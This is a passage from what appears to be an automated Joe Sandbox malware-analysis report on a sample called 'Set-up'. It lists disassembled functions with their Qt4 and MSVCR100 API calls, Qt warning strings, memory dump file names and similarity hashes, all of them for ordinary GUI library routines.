?removeAction@QWidget@@QAEXPAVQAction@@@Z.QTGUI4(?), ref: 6BC6E032
?size@QListData@@QBEHXZ.QTCORE4(?), ref: 6BC6E039
?at@QListData@@QBEPAPAXH@Z.QTCORE4(000000FF), ref: 6BC6E047
?end@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC6E051
?size@QListData@@QBEHXZ.QTCORE4 ref: 6BC6E08A
??0QActionEvent@@QAE@HPAVQAction@@0@Z.QTGUI4(00000072,?,00000000,?,00000000,?), ref: 6BC6E0C0
?sendEvent@QCoreApplication@@SA_NPAVQObject@@PAVQEvent@@@Z.QTCORE4 ref: 6BC6E0D3
??1QActionEvent@@UAE@XZ.QTGUI4 ref: 6BC6E0E8

Strings

QWidget::insertAction: Attempt to insert null action, xrefs: 6BC6DFE1

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?end@?size@ActionEvent@@$?at@?begin@?remove?sendAction@Action@@0@Action@@@Application@@CoreEvent@Event@@@Object@@Warning@@Widget@@
String ID: QWidget::insertAction: Attempt to insert null action
API String ID: 1491009403-2317025969
Opcode ID: ac15326f6bffa07ff9bae3809b6f5699788bd888ed7b0925472413042a5639c0
Instruction ID: d519c2650cc29b0d669856a4fdb25e129a5708926ca685413b1aa6b616d7317e
Opcode Fuzzy Hash: ac15326f6bffa07ff9bae3809b6f5699788bd888ed7b0925472413042a5639c0
Instruction Fuzzy Hash: 7431A931B242029FDB149F74C884A6E77F9EF857A4F04092EF556D7280FB389E0597A2

Function 6BCC9630 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 36threadCOMMON

Download Yara Rule

APIs

?instance@QCoreApplication@@SAPAV1@XZ.QTCORE4(?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000), ref: 6BCC9631
?qFatal@@YAXPBDZZ.QTCORE4(QPixmap: Must construct a QApplication before a QPaintDevice,?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000), ref: 6BCC9640
?instance@QCoreApplication@@SAPAV1@XZ.QTCORE4(00000120,?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000), ref: 6BCC964E
?thread@QObject@@QBEPAVQThread@@XZ.QTCORE4(?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000), ref: 6BCC9656
?currentThread@QThread@@SAPAV1@XZ.QTCORE4(?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000), ref: 6BCC965E
??0QLatin1String@@QAE@PBD@Z.QTCORE4(raster,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000), ref: 6BCC9672
??9QString@@QBE_NABVQLatin1String@@@Z.QTCORE4(00000000,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000,6C1A41E6,000000FF), ref: 6BCC967E
?qWarning@@YAXPBDZZ.QTCORE4(QPixmap: It is not safe to use pixmaps outside the GUI thread,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000,6C1A41E6,000000FF), ref: 6BCC968D

Strings

QPixmap: It is not safe to use pixmaps outside the GUI thread, xrefs: 6BCC9688
QPixmap: Must construct a QApplication before a QPaintDevice, xrefs: 6BCC963B
raster, xrefs: 6BCC9669

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?instance@Application@@CoreLatin1String@@Thread@@$?current?thread@Fatal@@Object@@String@@@Thread@Warning@@
String ID: QPixmap: It is not safe to use pixmaps outside the GUI thread$QPixmap: Must construct a QApplication before a QPaintDevice$raster
API String ID: 22922750-160004315
Opcode ID: 256747d2887f7aa8f46ee6dc60b12026276df530a51cdf7cd4ef6970ad5b28c8
Instruction ID: fdff7538abd4b34541825a212e290d9776a3e9be5ecebcb6f543590d3327d586
Opcode Fuzzy Hash: 256747d2887f7aa8f46ee6dc60b12026276df530a51cdf7cd4ef6970ad5b28c8
Instruction Fuzzy Hash: C1F05EB17522009FCF446BF0A86C48E3BB87E5321BB104865F417D3981EF248635BA97

Function 6BFB7130 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61windowCOMMON

Download Yara Rule

APIs

?style@QWidget@@QBEPAVQStyle@@XZ.QTGUI4(?,00000000,6C5610C0,?,6BFB7F54,00000000,?), ref: 6BFB713B
?cast@QMetaObject@@QBEPAVQObject@@PAV2@@Z.QTCORE4(6C1E4C94), ref: 6BFB716B
?setFocusPolicy@QWidget@@QAEXW4FocusPolicy@Qt@@@Z.QTGUI4(00000001), ref: 6BFB71A8
?setControlType@QSizePolicy@@QAEXW4ControlType@1@@Z.QTGUI4(00004000,00000001), ref: 6BFB71BA
?setSizePolicy@QWidget@@QAEXVQSizePolicy@@@Z.QTGUI4(?,00004000,00000001), ref: 6BFB71C6
?connect@QObject@@SA_NPBV1@PBD01W4ConnectionType@Qt@@@Z.QTCORE4(?,2pressed(),?,1_q_buttonPressed(),00000003,?,00004000,00000001), ref: 6BFB71D9
?setLayoutItemMargins@QWidgetPrivate@@QAEXW4SubElement@QStyle@@PBVQStyleOption@@@Z.QTGUI4(00000034,00000000,?,?,?,?,?,?), ref: 6BFB71E7

Strings

1_q_buttonPressed(), xrefs: 6BFB71CD
2pressed(), xrefs: 6BFB71D3

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?set$Object@@Policy@SizeWidget@@$ControlFocusQt@@@Style@@Type@$?cast@?connect@?style@ConnectionElement@ItemLayoutMargins@MetaOption@@@Policy@@Policy@@@Private@@StyleType@1@@V2@@Widget
String ID: 1_q_buttonPressed()$2pressed()
API String ID: 1759424213-2019240694
Opcode ID: c04e3ac0377f49f99a8a778f4becb9ffed27193fdf024c37b1740cf5a05b43aa
Instruction ID: 5a1bf72e343600b5c46443d43fe146cb86b4116dbd1e6158037af137700d4d4f
Opcode Fuzzy Hash: c04e3ac0377f49f99a8a778f4becb9ffed27193fdf024c37b1740cf5a05b43aa
Instruction Fuzzy Hash: BE119371610B00AFD3108F398885BABB7E9AF89715F40492DE1AAC72C0DF746A00DBA1

Function 6BD410A0 Relevance: 15.1, APIs: 10, Instructions: 93COMMON

Download Yara Rule

APIs

?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,?,?,00000000,00000001,?,?,00000000), ref: 6BD410D0
?detach_grow@QListData@@QAEPAUData@1@PAHH@Z.QTCORE4(?,?,?,?,00000000,00000001,?,?,00000000), ref: 6BD410E2
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,00000000,00000001,?,?), ref: 6BD410F6
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,00000000,00000001,?,?), ref: 6BD41101

Part of subcall function 6BD3FEB0: ??2@YAPAXI@Z.MSVCR100(00000020,B6508C7A,00000000,?,00000000,?), ref: 6BD3FEEF

?end@QListData@@QBEPAPAXXZ.QTCORE4(00000000,?,00000000,?,?,00000000,00000001,?,?), ref: 6BD41123
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,00000000,00000001,?,?), ref: 6BD4112E
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,?,?,?,?,00000000,00000001,?,?), ref: 6BD41156
??3@YAXPAX@Z.MSVCR100(?,?,?,?,00000000,00000001,?,?), ref: 6BD41179
?qFree@@YAXPAX@Z.QTCORE4(00000000,?,?,?,00000000,00000001,?,?), ref: 6BD41189
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,00000000,00000001,?,?), ref: 6BD41194

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@$??2@??3@?deref@?detach_grow@?end@AtomicBasicData@1@Free@@Int@@
String ID:
API String ID: 2701259130-0
Opcode ID: fd87bd7528a656dac5c2be199ecbc8baf308bbb24588990cc2eb31865d0fe6ff
Instruction ID: 02d4af872c97370fc2ae41e4672be164d78f8f4009629dce0e250112f1729592
Opcode Fuzzy Hash: fd87bd7528a656dac5c2be199ecbc8baf308bbb24588990cc2eb31865d0fe6ff
Instruction Fuzzy Hash: 11314D71A001199FCF04DF98D498AAEBBB9EF89724F008159E916DB341DB34AA15CBD1

Function 6BF9E600 Relevance: 13.6, APIs: 9, Instructions: 85COMMON

Download Yara Rule

APIs

?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,00000000,?,?,6BF9F04C,7FFFFFFF,00000001,?,?,?), ref: 6BF9E630
?detach_grow@QListData@@QAEPAUData@1@PAHH@Z.QTCORE4(?,?,?,?,?), ref: 6BF9E642
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BF9E654
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BF9E65E

Part of subcall function 6BF9DC20: ??2@YAPAXI@Z.MSVCR100(00000080,B6508C7A,00000000,?,00000000), ref: 6BF9DC67

?end@QListData@@QBEPAPAXXZ.QTCORE4(00000000,?,00000000), ref: 6BF9E67D
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,00000000), ref: 6BF9E687
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,?,?,00000000), ref: 6BF9E6AF
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,00000000), ref: 6BF9E6DC

Part of subcall function 6BF9DB50: ??1QVariant@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBB1
Part of subcall function 6BF9DB50: ??1QIcon@@QAE@XZ.QTGUI4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBBB
Part of subcall function 6BF9DB50: ??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBC8
Part of subcall function 6BF9DB50: ??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBD6
Part of subcall function 6BF9DB50: ??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBE7
Part of subcall function 6BF9DB50: ??3@YAXPAX@Z.MSVCR100(?,?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBEE

?qFree@@YAXPAX@Z.QTCORE4(?,?,?,?,?,00000000), ref: 6BF9E6D1

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@$String@@$??2@??3@?deref@?detach_grow@?end@AtomicBasicData@1@Free@@Icon@@Int@@Variant@@
String ID:
API String ID: 2213640284-0
Opcode ID: 8c2f22e469c4546544b95bd87d7dd8eec42d6c1bf00282f832c6d2399bf7f821
Instruction ID: aa702b4e645bd5e396c569eb5f17e67e36ba9139cd3a0e91e806b559e4ef5033
Opcode Fuzzy Hash: 8c2f22e469c4546544b95bd87d7dd8eec42d6c1bf00282f832c6d2399bf7f821
Instruction Fuzzy Hash: CF314D7570011AAFCB04DF98E558AAEB7BDFF49724F004219E906C7381DB34AA15CBE2

Function 6BC1DEC0 Relevance: 13.6, APIs: 9, Instructions: 83COMMON

Download Yara Rule

APIs

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?ref@AtomicBasicInt@@$Rect$PointTransform@@
String ID:
API String ID: 2797263965-0
Opcode ID: 85398381b2c20d69ea1d4ce110cd88e742d3168dce2417d474a35f0f169133a6
Instruction ID: 97d1f3c25edcd3cc17cb45f3fcde2e7b26d715a3ebe111f3c3165ff351628946
Opcode Fuzzy Hash: 85398381b2c20d69ea1d4ce110cd88e742d3168dce2417d474a35f0f169133a6
Instruction Fuzzy Hash: 5E41E0B0A00B41CFD724CF69D49479ABBE8FF99314F008A2EE4AA83750DBB465459F91

Function 6BC22660 Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,?,?,00000000), ref: 6BC22690
?detach_grow@QListData@@QAEPAUData@1@PAHH@Z.QTCORE4(?,?), ref: 6BC226A2
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC226B4
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC226BE

Part of subcall function 6BF74D10: memcpy.MSVCR100(00000000,00000000,?,6BC226D4,00000000,?,00000000), ref: 6BF74D30

?end@QListData@@QBEPAPAXXZ.QTCORE4(00000000,?,00000000), ref: 6BC226DD
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,00000000), ref: 6BC226E7
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,?,?,00000000), ref: 6BC2270F
?qFree@@YAXPAX@Z.QTCORE4(?,?,?,00000000), ref: 6BC2271A
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,00000000), ref: 6BC22725

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@$?deref@?detach_grow@?end@AtomicBasicData@1@Free@@Int@@memcpy
String ID:
API String ID: 2235209544-0
Opcode ID: 106f08d9cb4b14f81ad21bda088cab6352c782d901dd9de63ae5d60f72038cc8
Instruction ID: fd860e158bac3aa17cfc97b2467ded222344b94293849d69f6afc4dc06dc0fdb
Opcode Fuzzy Hash: 106f08d9cb4b14f81ad21bda088cab6352c782d901dd9de63ae5d60f72038cc8
Instruction Fuzzy Hash: 48214B75700119EFCF04DF98E458AAE7BBDEF49664F10411AE806D7381DB345B148BD1

Function 6C0CB5E0 Relevance: 13.6, APIs: 9, Instructions: 69COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000148,B6508C7A,?,00000000,?,?,?,?,00000000,6C1A526B,000000FF,6C0E697B,?,00000000,00000000,00000000), ref: 6C0CB611
??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4 ref: 6C0CB62D

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QLineF@@QAE@XZ.QTCORE4 ref: 6C0CB643
??0QPen@@QAE@XZ.QTGUI4 ref: 6C0CB64F
??0QGraphicsItem@@IAE@AAVQGraphicsItemPrivate@@PAV0@PAVQGraphicsScene@@@Z.QTGUI4(00000000,?,?), ref: 6C0CB66D
??8QLineF@@QBE_NABV0@@Z.QTCORE4(?,00000000,?,?), ref: 6C0CB690
?prepareGeometryChange@QGraphicsItem@@IAEXXZ.QTGUI4 ref: 6C0CB69C
??0QRectF@@QAE@XZ.QTCORE4 ref: 6C0CB6AC
?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000), ref: 6C0CB6B5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Graphics$?ref@AtomicBasicInt@@$Rect$Item@@$ItemLinePrivate@@$??2@?prepare?update@Change@F@@@GeometryPen@@PointScene@@@Transform@@V0@@
String ID:
API String ID: 4044851681-0
Opcode ID: bd2829f0695f480dbcc003597cd002988f748cf82218d299d5a18fd233625bcc
Instruction ID: 94c72b6c8b7f2521a6a0ef3c87ce119d0a8e4f18acdea637219dfd0022cc8042
Opcode Fuzzy Hash: bd2829f0695f480dbcc003597cd002988f748cf82218d299d5a18fd233625bcc
Instruction Fuzzy Hash: 6121AF712082409BD714CF68C84579FBBE8FF89714F004A2DF95687790CB79A9098BA2

Function 6BC20650 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(?,?,6C0C6696,00000002), ref: 6BC20659
?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000,00800000), ref: 6BC20673
?size@QListData@@QBEHXZ.QTCORE4 ref: 6BC20682
?size@QListData@@QBEHXZ.QTCORE4 ref: 6BC20698
??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001), ref: 6BC206A6
?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000), ref: 6BC206C0
??1QVariant@@QAE@XZ.QTCORE4 ref: 6BC206CF
??3@YAXPAX@Z.MSVCR100(?), ref: 6BC206D6
?remove@QListData@@QAEXH@Z.QTCORE4(00000000), ref: 6BC206E1

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?size@$?at@$??3@?remove@AtomicBasicInt@@Variant@@
String ID:
API String ID: 1340883999-0
Opcode ID: cfda84101bd619f3b1d841e476cdc7bf6eeec12d9e61d2c27c8b4a29a65ddb11
Instruction ID: 8a9a2edb0a4bf2eaf6bdbd7c63d9234dca8a4381e07d111115d0ac90d4abf337
Opcode Fuzzy Hash: cfda84101bd619f3b1d841e476cdc7bf6eeec12d9e61d2c27c8b4a29a65ddb11
Instruction Fuzzy Hash: 0211E1323042018FDB009FA4E8A496EB3BAFFD6715700405EEA06CB250EF359E56DBE1

Function 6BF9D3E0 Relevance: 13.6, APIs: 9, Instructions: 56windowCOMMON

Download Yara Rule

APIs

??0QString@@QAE@ABV0@@Z.QTCORE4(?,B6508C7A,00000000,?,?,?,6C18969F,000000FF,6BFA4039,?,?,?,?,?), ref: 6BF9D419
??0QString@@QAE@XZ.QTCORE4(?,?,?), ref: 6BF9D426
??0QString@@QAE@XZ.QTCORE4 ref: 6BF9D434
??0QIcon@@QAE@ABV0@@Z.QTGUI4(?), ref: 6BF9D447

Part of subcall function 6BCA13D0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BF9D44C,?), ref: 6BCA13E2

??0QRect@@QAE@XZ.QTCORE4(?), ref: 6BF9D454
??0QRect@@QAE@XZ.QTCORE4 ref: 6BF9D45D
??0QRect@@QAE@XZ.QTCORE4 ref: 6BF9D466
?invalidate@QColor@@AAEXXZ.QTGUI4 ref: 6BF9D46F
??0QVariant@@QAE@XZ.QTCORE4 ref: 6BF9D477

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Rect@@String@@$V0@@$?invalidate@?ref@AtomicBasicColor@@Icon@@Int@@Variant@@
String ID:
API String ID: 587614999-0
Opcode ID: 3e3184a3be29188f4d5b9cd56918f79861ae69af7208a75dfe57d9df861cbe6b
Instruction ID: e73dccf3d44c089eb3035892250daf169cef2547dc6fea67bce449c0b8bc0421
Opcode Fuzzy Hash: 3e3184a3be29188f4d5b9cd56918f79861ae69af7208a75dfe57d9df861cbe6b
Instruction Fuzzy Hash: 2C213071104B818FC725DF29C448A5AFBF8FF65714F004D0EE497826A1DB74A609CB92

Function 6C0EDB80 Relevance: 13.6, APIs: 9, Instructions: 56COMMON

Download Yara Rule

APIs

??0QPointF@@QAE@XZ.QTCORE4(B6508C7A,00000000,?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBBE
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBC7
??0QPoint@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBD0
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBD9
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBE2
??0QPoint@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBEB
